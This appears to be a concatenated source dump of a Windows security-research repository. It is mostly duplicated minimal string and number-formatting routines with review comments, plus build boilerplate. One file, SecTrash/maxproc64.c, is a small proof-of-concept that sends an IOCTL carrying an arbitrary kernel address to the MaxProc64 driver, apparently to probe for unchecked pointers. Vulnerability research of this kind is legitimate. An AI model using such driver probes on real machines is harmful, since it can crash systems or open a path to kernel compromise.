5 | // 4. Use the Error List window to view errors
6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
8 |
9 | #ifndef PCH_H
10 | #define PCH_H
11 |
12 | // TODO: add headers that you want to pre-compile here
13 |
14 | #endif //PCH_H
15 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/pch.h:
--------------------------------------------------------------------------------
1 | // Tips for Getting Started:
2 | // 1. Use the Solution Explorer window to add/manage files
3 | // 2. Use the Team Explorer window to connect to source control
4 | // 3. Use the Output window to see build output and other messages
5 | // 4. Use the Error List window to view errors
6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
8 |
9 | #ifndef PCH_H
10 | #define PCH_H
11 |
12 | // TODO: add headers that you want to pre-compile here
13 |
14 | #endif //PCH_H
15 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/Driver.h:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #pragma once
11 |
12 | #define OLS_DRIVER_INSTALL 1
13 | #define OLS_DRIVER_REMOVE 2
14 | #define OLS_DRIVER_SYSTEM_INSTALL 3
15 | #define OLS_DRIVER_SYSTEM_UNINSTALL 4
16 |
17 | BOOL ManageDriver(LPCTSTR DriverId, LPCTSTR DriverPath, USHORT Function);
--------------------------------------------------------------------------------
/source/ApiSetSchema/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Resource.rc
4 | //
5 | #define IDD_ASDIALOG 101
6 | #define IDI_ICON_MAIN 103
7 | #define IDC_SEARCH_EDIT 1001
8 | #define IDC_SEARCH_BUTTON 1002
9 | #define IDC_ENTRY_EDIT 1003
10 |
11 | // Next default values for new objects
12 | //
13 | #ifdef APSTUDIO_INVOKED
14 | #ifndef APSTUDIO_READONLY_SYMBOLS
15 | #define _APS_NEXT_RESOURCE_VALUE 104
16 | #define _APS_NEXT_COMMAND_VALUE 40001
17 | #define _APS_NEXT_CONTROL_VALUE 1003
18 | #define _APS_NEXT_SYMED_VALUE 101
19 | #endif
20 | #endif
21 |
--------------------------------------------------------------------------------
/source/StripDebug/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Copy the NUL-terminated ANSI string src into dest.
 *
 * dest: destination buffer; returned untouched when null.
 * src:  string to copy; when null, or when it is the same pointer as dest,
 *       nothing is written.
 *
 * Returns dest in every case.
 *
 * The copy stops only at the terminator of src. The caller must ensure
 * dest can hold strlen(src) + 1 characters; a shorter buffer is overrun.
 */
char *_strcpy_a(char *dest, const char *src)
{
    char *out = dest;

    if (dest == 0 || src == 0 || dest == src)
        return dest;

    /* Copy each character, terminator included. */
    while ((*out = *src) != 0) {
        out++;
        src++;
    }

    return dest;
}
23 |
/*
 * Copy the NUL-terminated wide string src into dest.
 *
 * dest: destination buffer; returned untouched when null.
 * src:  string to copy; when null, or when it is the same pointer as dest,
 *       nothing is written.
 *
 * Returns dest in every case.
 *
 * The copy stops only at the terminator of src. The caller must ensure
 * dest can hold the source length plus one element; a shorter buffer is
 * overrun.
 */
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *out = dest;

    if (dest == 0 || src == 0 || dest == src)
        return dest;

    /* Copy each character, terminator included. */
    while ((*out = *src) != 0) {
        out++;
        src++;
    }

    return dest;
}
44 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Overwrite dest with a copy of the ANSI string src.
 *
 * dest: buffer to fill (null is tolerated).
 * src:  NUL-terminated string to copy (null is tolerated).
 *
 * Returns dest. Nothing is written when either pointer is null or when
 * both point at the same address.
 *
 * No destination size is taken; the buffer must be at least
 * strlen(src) + 1 characters or the copy writes beyond it.
 */
char *_strcpy_a(char *dest, const char *src)
{
    char *cursor;

    if (!dest || !src)
        return dest;

    if (src == dest)
        return dest;

    for (cursor = dest; *src != 0; cursor++, src++)
        *cursor = *src;

    *cursor = 0;
    return dest;
}
23 |
/*
 * Overwrite dest with a copy of the wide string src.
 *
 * dest: buffer to fill (null is tolerated).
 * src:  NUL-terminated string to copy (null is tolerated).
 *
 * Returns dest. Nothing is written when either pointer is null or when
 * both point at the same address.
 *
 * No destination size is taken; the buffer must hold the source length
 * plus one element or the copy writes beyond it.
 */
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *cursor;

    if (!dest || !src)
        return dest;

    if (src == dest)
        return dest;

    for (cursor = dest; *src != 0; cursor++, src++)
        *cursor = *src;

    *cursor = 0;
    return dest;
}
44 |
--------------------------------------------------------------------------------
/source/StripDebug/StripDebug.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\MAKEEXE\StripDebug\StripDebug\test.exe
5 | WindowsLocalDebugger
6 |
7 |
8 | C:\MAKEEXE\StripDebug\StripDebug\test.exe
9 | WindowsLocalDebugger
10 |
11 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Copy the NUL-terminated ANSI string src into dest.
 *
 * dest: destination buffer; returned untouched when null.
 * src:  string to copy; when null, or when it is the same pointer as dest,
 *       nothing is written.
 *
 * Returns dest in every case.
 *
 * Unbounded: only the terminator of src ends the copy, so dest has to be
 * sized by the caller for strlen(src) + 1 characters.
 */
char *_strcpy_a(char *dest, const char *src)
{
    char *out = dest;

    if (dest == 0 || src == 0 || dest == src)
        return dest;

    /* Copy each character, terminator included. */
    while ((*out = *src) != 0) {
        out++;
        src++;
    }

    return dest;
}
23 |
/*
 * Copy the NUL-terminated wide string src into dest.
 *
 * dest: destination buffer; returned untouched when null.
 * src:  string to copy; when null, or when it is the same pointer as dest,
 *       nothing is written.
 *
 * Returns dest in every case.
 *
 * Unbounded: only the terminator of src ends the copy, so dest has to be
 * sized by the caller for the source length plus one element.
 */
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *out = dest;

    if (dest == 0 || src == 0 || dest == src)
        return dest;

    /* Copy each character, terminator included. */
    while ((*out = *src) != 0) {
        out++;
        src++;
    }

    return dest;
}
44 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Overwrite dest with a copy of the ANSI string src.
 *
 * dest: buffer to fill (null is tolerated).
 * src:  NUL-terminated string to copy (null is tolerated).
 *
 * Returns dest. Nothing is written when either pointer is null or when
 * both point at the same address.
 *
 * The destination size is not known to this routine; callers must size
 * dest for the source text plus its terminator.
 */
char *_strcpy_a(char *dest, const char *src)
{
    char *cursor;

    if (!dest || !src)
        return dest;

    if (src == dest)
        return dest;

    for (cursor = dest; *src != 0; cursor++, src++)
        *cursor = *src;

    *cursor = 0;
    return dest;
}
23 |
/*
 * Overwrite dest with a copy of the wide string src.
 *
 * dest: buffer to fill (null is tolerated).
 * src:  NUL-terminated string to copy (null is tolerated).
 *
 * Returns dest. Nothing is written when either pointer is null or when
 * both point at the same address.
 *
 * The destination size is not known to this routine; callers must size
 * dest for the source text plus its terminator.
 */
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *cursor;

    if (!dest || !src)
        return dest;

    if (src == dest)
        return dest;

    for (cursor = dest; *src != 0; cursor++, src++)
        *cursor = *src;

    *cursor = 0;
    return dest;
}
44 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Copy the NUL-terminated ANSI string src into dest.
 *
 * dest: destination buffer; returned untouched when null.
 * src:  string to copy; when null, or when it is the same pointer as dest,
 *       nothing is written.
 *
 * Returns dest in every case.
 *
 * The length of dest is never consulted. A source longer than the buffer
 * is written past its end, so the caller has to check sizes beforehand.
 */
char *_strcpy_a(char *dest, const char *src)
{
    char *out = dest;

    if (dest == 0 || src == 0 || dest == src)
        return dest;

    /* Copy each character, terminator included. */
    while ((*out = *src) != 0) {
        out++;
        src++;
    }

    return dest;
}
23 |
/*
 * Copy the NUL-terminated wide string src into dest.
 *
 * dest: destination buffer; returned untouched when null.
 * src:  string to copy; when null, or when it is the same pointer as dest,
 *       nothing is written.
 *
 * Returns dest in every case.
 *
 * The length of dest is never consulted. A source longer than the buffer
 * is written past its end, so the caller has to check sizes beforehand.
 */
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *out = dest;

    if (dest == 0 || src == 0 || dest == src)
        return dest;

    /* Copy each character, terminator included. */
    while ((*out = *src) != 0) {
        out++;
        src++;
    }

    return dest;
}
44 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/ultohex.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Format x as exactly eight upper-case hexadecimal digits (ANSI).
 *
 * x: value to format. Only the low 32 bits are rendered, because eight
 *    nibbles are emitted regardless of the width of unsigned long.
 * s: output buffer, or null to skip the write.
 *
 * Returns 8 in every case (the number of digits, terminator excluded).
 *
 * When s is not null, nine characters are stored: s[0]..s[7] hold the
 * zero-padded digits and s[8] the terminator. The buffer must therefore
 * be at least nine characters long.
 */
size_t ultohex_a(unsigned long x, char *s)
{
    static const char hexdigits[] = "0123456789ABCDEF";
    size_t pos;

    if (s == 0)
        return 8;

    /* Fill right to left so the least significant nibble lands in s[7]. */
    for (pos = 8; pos != 0; pos--) {
        s[pos - 1] = hexdigits[x & 0xf];
        x >>= 4;
    }

    s[8] = 0;
    return 8;
}
26 |
/*
 * Format x as exactly eight upper-case hexadecimal digits (wide).
 *
 * x: value to format. Only the low 32 bits are rendered, because eight
 *    nibbles are emitted regardless of the width of unsigned long.
 * s: output buffer, or null to skip the write.
 *
 * Returns 8 in every case (the number of digits, terminator excluded).
 *
 * When s is not null, nine elements are stored: s[0]..s[7] hold the
 * zero-padded digits and s[8] the terminator. The buffer must therefore
 * be at least nine wchar_t elements long.
 */
size_t ultohex_w(unsigned long x, wchar_t *s)
{
    static const wchar_t hexdigits[] = L"0123456789ABCDEF";
    size_t pos;

    if (s == 0)
        return 8;

    /* Fill right to left so the least significant nibble lands in s[7]. */
    for (pos = 8; pos != 0; pos--) {
        s[pos - 1] = hexdigits[x & 0xf];
        x >>= 4;
    }

    s[8] = 0;
    return 8;
}
50 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/ultostr.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * ultostr_a - render x in decimal.
 *
 * Returns the number of digits. With s == 0 only the count is computed,
 * which lets a caller size the buffer first. Otherwise the digits and a
 * terminating NUL are written, so s needs (return value + 1) chars; the
 * function has no way to verify that.
 */
size_t ultostr_a(unsigned long x, char *s)
{
    unsigned long rest;
    size_t len = 1, pos;

    /* count digits; zero still takes one */
    for (rest = x; rest >= 10; rest /= 10)
        len++;

    if (s == 0)
        return len;

    /* fill right to left */
    pos = len;
    while (pos != 0) {
        pos--;
        s[pos] = (char)(x % 10) + '0';
        x /= 10;
    }

    s[len] = (char)0;
    return len;
}
24 |
/*
 * ultostr_w - render x in decimal as a wide string.
 *
 * Returns the number of digits. With s == 0 only the count is computed.
 * Otherwise the digits and a terminator are written, so s needs
 * (return value + 1) wchar_t elements; the function cannot verify that.
 */
size_t ultostr_w(unsigned long x, wchar_t *s)
{
    unsigned long rest;
    size_t len = 1, pos;

    /* count digits; zero still takes one */
    for (rest = x; rest >= 10; rest /= 10)
        len++;

    if (s == 0)
        return len;

    /* fill right to left */
    pos = len;
    while (pos != 0) {
        pos--;
        s[pos] = (wchar_t)(x % 10) + L'0';
        x /= 10;
    }

    s[len] = (wchar_t)0;
    return len;
}
46 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/ultostr.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * ultostr_a - unsigned long to decimal text.
 *
 * The return value is the digit count, not counting the terminator.
 * Passing s == 0 performs a length query only. When s is given, the
 * caller owns the sizing: (digit count + 1) chars are written and no
 * bound is checked here.
 */
size_t ultostr_a(unsigned long x, char *s)
{
    size_t digits = 1;
    size_t idx;
    unsigned long probe = x;

    while (probe >= 10) {
        digits++;
        probe /= 10;
    }

    if (s == 0)
        return digits;

    s[digits] = (char)0;
    for (idx = digits; idx != 0; idx--) {
        s[idx - 1] = (char)(x % 10) + '0';
        x /= 10;
    }

    return digits;
}
24 |
/*
 * ultostr_w - unsigned long to decimal wide text.
 *
 * The return value is the digit count, not counting the terminator.
 * Passing s == 0 performs a length query only. When s is given, the
 * caller owns the sizing: (digit count + 1) elements are written and no
 * bound is checked here.
 */
size_t ultostr_w(unsigned long x, wchar_t *s)
{
    size_t digits = 1;
    size_t idx;
    unsigned long probe = x;

    while (probe >= 10) {
        digits++;
        probe /= 10;
    }

    if (s == 0)
        return digits;

    s[digits] = (wchar_t)0;
    for (idx = digits; idx != 0; idx--) {
        s[idx - 1] = (wchar_t)(x % 10) + L'0';
        x /= 10;
    }

    return digits;
}
46 |
--------------------------------------------------------------------------------
/source/SecTrash/maxproc64.c:
--------------------------------------------------------------------------------
/*
 * Opens the \\.\MaxProc64 device, sends one request through CallDriver
 * and prints the NTSTATUS that comes back. Returns -1 if the device
 * cannot be opened.
 *
 * CallDriver is defined elsewhere, so the meaning of its arguments is
 * assumed here: presumably (handle, I/O control code, input buffer,
 * input length, output buffer, output length) -- confirm against its
 * definition. If 0x220019 is the control code, it decodes as device type
 * 0x22, function 6, METHOD_IN_DIRECT, FILE_ANY_ACCESS.
 *
 * The pointer argument is a fixed address in the kernel half of the
 * 64-bit address space, not memory this program owns, with lengths of
 * zero. On the driver side the matching defence is to validate every
 * caller-supplied pointer and length before use and to restrict who may
 * open the device object.
 */
int main()
{
    NTSTATUS ntStatus;
    HANDLE deviceHandle;

    deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"),
                              GENERIC_READ | GENERIC_WRITE,
                              0,
                              NULL,
                              OPEN_EXISTING,
                              0,
                              NULL);

    if (deviceHandle == INVALID_HANDLE_VALUE) {
        printf_s("[!] Unable to open device\r\n");
        return -1;
    }

    printf_s("[+] MaxProc64 device opened\r\n");

    ntStatus = CallDriver(deviceHandle, 0x220019, (PVOID)0xFFFFFFFF12345678, 0, NULL, 0);

    printf_s("[+] CallDriver NTSTATUS 0x%lX\r\n", ntStatus);

    CloseHandle(deviceHandle);
}
33 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strcmp.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * _strcmp_a - compare two NUL-terminated strings.
 *
 * Returns 0 when the pointers are identical or the strings match, -1
 * when only s1 is null, 1 when only s2 is null, otherwise the difference
 * of the first pair of characters that differ.
 *
 * The difference is taken on plain char, so its sign for bytes above
 * 0x7F depends on whether char is signed. The loop stops at the first
 * mismatch, so run time depends on the inputs.
 */
int _strcmp_a(const char *s1, const char *s2)
{
    char a, b;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    for (;;) {
        a = *s1++;
        b = *s2++;
        if (a == 0 || a != b)
            break;
    }

    return (int)(a - b);
}
25 |
/*
 * _strcmp_w - compare two NUL-terminated wide strings.
 *
 * Returns 0 when the pointers are identical or the strings match, -1
 * when only s1 is null, 1 when only s2 is null, otherwise the difference
 * of the first pair of characters that differ. The loop stops at the
 * first mismatch, so run time depends on the inputs.
 */
int _strcmp_w(const wchar_t *s1, const wchar_t *s2)
{
    wchar_t a, b;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    for (;;) {
        a = *s1++;
        b = *s2++;
        if (a == 0 || a != b)
            break;
    }

    return (int)(a - b);
}
48 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/ultohex.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * ultohex_a - 8-digit uppercase hex rendering of x.
 *
 * Always reports 8. When s is non-null, s[0..7] receive the digits (most
 * significant first) and s[8] the terminator, so the buffer must hold 9
 * chars. Bits of x above the low 32 are ignored.
 */
size_t ultohex_a(unsigned long x, char *s)
{
    static const size_t width = 8;
    size_t done;
    char nibble;

    if (s == 0)
        return 8;

    for (done = 0; done < width; done++, x >>= 4) {
        nibble = (char)(x & 0xf);
        if (nibble >= 10)
            nibble = 'A' + (nibble - 10);
        else
            nibble += '0';
        s[width - 1 - done] = nibble;
    }

    s[width] = 0;
    return 8;
}
26 |
/*
 * ultohex_w - 8-digit uppercase hex rendering of x as wide characters.
 *
 * Always reports 8. When s is non-null, s[0..7] receive the digits (most
 * significant first) and s[8] the terminator, so the buffer must hold 9
 * wchar_t elements. Bits of x above the low 32 are ignored.
 */
size_t ultohex_w(unsigned long x, wchar_t *s)
{
    static const size_t width = 8;
    size_t done;
    wchar_t nibble;

    if (s == 0)
        return 8;

    for (done = 0; done < width; done++, x >>= 4) {
        nibble = (wchar_t)(x & 0xf);
        if (nibble >= 10)
            nibble = L'A' + (nibble - 10);
        else
            nibble += L'0';
        s[width - 1 - done] = nibble;
    }

    s[width] = 0;
    return 8;
}
50 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/u64tohex.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * u64tohex_a - format x as exactly 16 uppercase hexadecimal digits.
 *
 * Writes 16 digits followed by a NUL into s and returns 16. With s == 0
 * nothing is written and 16 is still returned. The caller must supply
 * room for 17 chars; no length is passed in to check against.
 */
size_t u64tohex_a(unsigned long long x, char *s)
{
    size_t pos;
    char digit;

    if (s == 0)
        return 16;

    /* least significant nibble goes to the right-most slot */
    for (pos = 16; pos > 0; pos--) {
        digit = (char)(x & 0xf);
        digit = (digit < 10) ? (char)(digit + '0') : (char)('A' + (digit - 10));
        s[pos - 1] = digit;
        x >>= 4;
    }

    s[16] = 0;
    return 16;
}
26 |
/*
 * u64tohex_w - format x as exactly 16 uppercase hexadecimal wide digits.
 *
 * Writes 16 digits followed by a terminator into s and returns 16. With
 * s == 0 nothing is written and 16 is still returned. The caller must
 * supply room for 17 wchar_t elements; no length is passed in.
 */
size_t u64tohex_w(unsigned long long x, wchar_t *s)
{
    size_t pos;
    wchar_t digit;

    if (s == 0)
        return 16;

    /* least significant nibble goes to the right-most slot */
    for (pos = 16; pos > 0; pos--) {
        digit = (wchar_t)(x & 0xf);
        if (digit < 10)
            digit += L'0';
        else
            digit = L'A' + (digit - 10);
        s[pos - 1] = digit;
        x >>= 4;
    }

    s[16] = 0;
    return 16;
}
50 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/u64tostr.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * u64tostr_a - render x in decimal.
 *
 * Returns the number of digits. With s == 0 only the count is computed,
 * which lets a caller size the buffer first. Otherwise the digits and a
 * terminating NUL are written, so s needs (return value + 1) chars --
 * up to 21 for a 64-bit value. The function cannot verify that.
 */
size_t u64tostr_a(unsigned long long x, char *s)
{
    unsigned long long rest;
    size_t len = 1, pos;

    /* count digits; zero still takes one */
    for (rest = x; rest >= 10; rest /= 10)
        len++;

    if (s == 0)
        return len;

    /* fill right to left */
    pos = len;
    while (pos != 0) {
        pos--;
        s[pos] = (char)(x % 10) + '0';
        x /= 10;
    }

    s[len] = (char)0;
    return len;
}
24 |
/*
 * u64tostr_w - render x in decimal as a wide string.
 *
 * Returns the number of digits. With s == 0 only the count is computed.
 * Otherwise the digits and a terminator are written, so s needs
 * (return value + 1) wchar_t elements -- up to 21 for a 64-bit value.
 * The function cannot verify that.
 */
size_t u64tostr_w(unsigned long long x, wchar_t *s)
{
    unsigned long long rest;
    size_t len = 1, pos;

    /* count digits; zero still takes one */
    for (rest = x; rest >= 10; rest /= 10)
        len++;

    if (s == 0)
        return len;

    /* fill right to left */
    pos = len;
    while (pos != 0) {
        pos--;
        s[pos] = (wchar_t)(x % 10) + L'0';
        x /= 10;
    }

    s[len] = (wchar_t)0;
    return len;
}
46 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.idl:
--------------------------------------------------------------------------------
1 | // AmsiScan.idl : IDL source for AmsiScan
2 | //
3 |
4 | // This file will be processed by the MIDL tool to
5 | // produce the type library (AmsiScan.tlb) and marshalling code.
6 |
7 | import "oaidl.idl";
8 | import "ocidl.idl";
9 |
// IAmsiProvider: a dual, non-extensible automation interface derived from
// IDispatch. It declares no methods of its own.
// NOTE(review): the AMSI provider contract itself (IAntimalwareProvider,
// declared in amsi.h) is not described in this IDL; presumably the class
// implements it directly in code -- confirm against the class declaration.
[
    object,
    uuid(05025dfe-70d5-4b61-a55a-aa21585d4cb2),
    dual,
    nonextensible,
    pointer_default(unique)
]
interface IAmsiProvider : IDispatch
{
};
// Type library AmsiScanLib, version 1.0. It exposes one coclass,
// AmsiProvider, whose default interface is IAmsiProvider.
// NOTE(review): the coclass uuid is presumably the CLSID used when the
// provider is registered; the registration code is not visible here.
[
    uuid(508c88ef-ca97-4107-a022-6025892ef192),
    version(1.0),
]
library AmsiScanLib
{
    importlib("stdole2.tlb");
    [
        uuid(1c0643e1-5b0a-4420-9b76-0de9264b4c59)
    ]
    coclass AmsiProvider
    {
        [default] interface IAmsiProvider;
    };
};
35 |
36 | import "shobjidl.idl";
37 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/u64tohex.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * u64tohex_a - 16-digit uppercase hex rendering of x.
 *
 * Always reports 16. When s is non-null, s[0..15] receive the digits
 * (most significant first) and s[16] the terminator, so the buffer must
 * hold 17 chars; nothing here can check that.
 */
size_t u64tohex_a(unsigned long long x, char *s)
{
    static const size_t width = 16;
    size_t done;
    char nibble;

    if (s == 0)
        return 16;

    for (done = 0; done < width; done++, x >>= 4) {
        nibble = (char)(x & 0xf);
        if (nibble >= 10)
            nibble = 'A' + (nibble - 10);
        else
            nibble += '0';
        s[width - 1 - done] = nibble;
    }

    s[width] = 0;
    return 16;
}
26 |
/*
 * u64tohex_w - 16-digit uppercase hex rendering of x as wide characters.
 *
 * Always reports 16. When s is non-null, s[0..15] receive the digits
 * (most significant first) and s[16] the terminator, so the buffer must
 * hold 17 wchar_t elements; nothing here can check that.
 */
size_t u64tohex_w(unsigned long long x, wchar_t *s)
{
    static const size_t width = 16;
    size_t done;
    wchar_t nibble;

    if (s == 0)
        return 16;

    for (done = 0; done < width; done++, x >>= 4) {
        nibble = (wchar_t)(x & 0xf);
        if (nibble >= 10)
            nibble = L'A' + (nibble - 10);
        else
            nibble += L'0';
        s[width - 1 - done] = nibble;
    }

    s[width] = 0;
    return 16;
}
50 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strcmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * _strcmpi_a - case-insensitive comparison of two NUL-terminated strings.
 *
 * Returns 0 when the pointers are identical or the folded strings match,
 * -1 when only s1 is null, 1 when only s2 is null, otherwise the
 * difference of the first pair of folded characters that differ.
 *
 * Folding is done by locase_a, which in this project's rtltypes.h maps
 * only 'A'..'Z'; other characters compare by exact value.
 */
int _strcmpi_a(const char *s1, const char *s2)
{
    char a, b;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    for (;;) {
        a = locase_a(*s1);
        b = locase_a(*s2);
        s1++;
        s2++;
        if (a == 0 || a != b)
            break;
    }

    return (int)(a - b);
}
25 |
/*
 * _strcmpi_w - case-insensitive comparison of two wide strings.
 *
 * Returns 0 when the pointers are identical or the folded strings match,
 * -1 when only s1 is null, 1 when only s2 is null, otherwise the
 * difference of the first pair of folded characters that differ.
 *
 * Folding is done by locase_w, which in this project's rtltypes.h maps
 * only 'A'..'Z'; non-ASCII letters are compared by exact code unit.
 */
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
{
    wchar_t a, b;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    for (;;) {
        a = locase_w(*s1);
        b = locase_w(*s2);
        s1++;
        s2++;
        if (a == 0 || a != b)
            break;
    }

    return (int)(a - b);
}
48 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strcmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * _strcmpi_a - compare two strings ignoring ASCII case.
 *
 * Identical pointers compare equal; a lone null s1 yields -1 and a lone
 * null s2 yields 1. Otherwise both strings are walked in step, each
 * character passed through locase_a, until the folded characters differ
 * or the terminator is reached; the result is their difference.
 *
 * locase_a (rtltypes.h in this project) folds 'A'..'Z' only.
 */
int _strcmpi_a(const char *s1, const char *s2)
{
    char left, right;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    left = locase_a(*s1);
    right = locase_a(*s2);
    while (left != 0 && left == right) {
        s1++;
        s2++;
        left = locase_a(*s1);
        right = locase_a(*s2);
    }

    return (int)(left - right);
}
25 |
/*
 * _strcmpi_w - compare two wide strings ignoring ASCII case.
 *
 * Identical pointers compare equal; a lone null s1 yields -1 and a lone
 * null s2 yields 1. Otherwise both strings are walked in step, each
 * character passed through locase_w, until the folded characters differ
 * or the terminator is reached; the result is their difference.
 *
 * locase_w (rtltypes.h in this project) folds 'A'..'Z' only.
 */
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
{
    wchar_t left, right;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    left = locase_w(*s1);
    right = locase_w(*s2);
    while (left != 0 && left == right) {
        s1++;
        s2++;
        left = locase_w(*s1);
        right = locase_w(*s2);
    }

    return (int)(left - right);
}
48 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/stdafx.h:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007-2008 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #pragma once
11 |
// Minimum-platform macros. Each one is defined only when the build has
// not already set it, so a project-level definition takes precedence.
#ifndef WINVER
#define WINVER 0x0400
#endif

#ifndef _WIN32_WINNT
#define _WIN32_WINNT 0x0400
#endif

#ifndef _WIN32_WINDOWS
#define _WIN32_WINDOWS 0x0410
#endif

#ifndef _WIN32_IE
#define _WIN32_IE 0x0600
#endif

// WIN32_LEAN_AND_MEAN trims rarely used parts out of the Windows headers.
#define WIN32_LEAN_AND_MEAN
// NOTE(review): the include target on the next line is missing in this
// listing (probably lost when the page was extracted) -- restore it from
// the original file.
#include
30 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strncpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * _strncpy_a - bounded string copy that always terminates.
 *
 * dest    destination buffer
 * ccdest  capacity of dest in chars, terminator included
 * src     source string
 * ccsrc   maximum number of chars to take from src
 *
 * Returns dest. Nothing is written when dest or src is null or ccdest is
 * zero. Otherwise at most ccdest - 1 chars are copied and a NUL is always
 * appended. Truncation is silent: the return value does not tell the
 * caller whether the whole source fitted.
 */
char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
{
    char *out;
    size_t room;

    if (dest == 0 || src == 0 || ccdest == 0)
        return dest;

    room = ccdest - 1;  /* keep one slot for the terminator */
    for (out = dest; *src != 0 && room > 0 && ccsrc > 0; room--, ccsrc--)
        *out++ = *src++;

    *out = 0;
    return dest;
}
24 |
/*
 * _strncpy_w - bounded wide-string copy that always terminates.
 *
 * dest    destination buffer
 * ccdest  capacity of dest in wchar_t elements, terminator included
 * src     source string
 * ccsrc   maximum number of elements to take from src
 *
 * Returns dest. Nothing is written when dest or src is null or ccdest is
 * zero. Otherwise at most ccdest - 1 elements are copied and a terminator
 * is always appended. Both counts are in elements, not bytes. Truncation
 * is silent.
 */
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
{
    wchar_t *out;
    size_t room;

    if (dest == 0 || src == 0 || ccdest == 0)
        return dest;

    room = ccdest - 1;  /* keep one slot for the terminator */
    for (out = dest; *src != 0 && room > 0 && ccsrc > 0; room--, ccsrc--)
        *out++ = *src++;

    *out = 0;
    return dest;
}
46 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strncpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * _strncpy_a - copy up to ccsrc chars of src into a buffer of ccdest chars.
 *
 * One slot of dest is reserved for the terminator, so at most
 * ccdest - 1 chars are copied and the result is always NUL-terminated
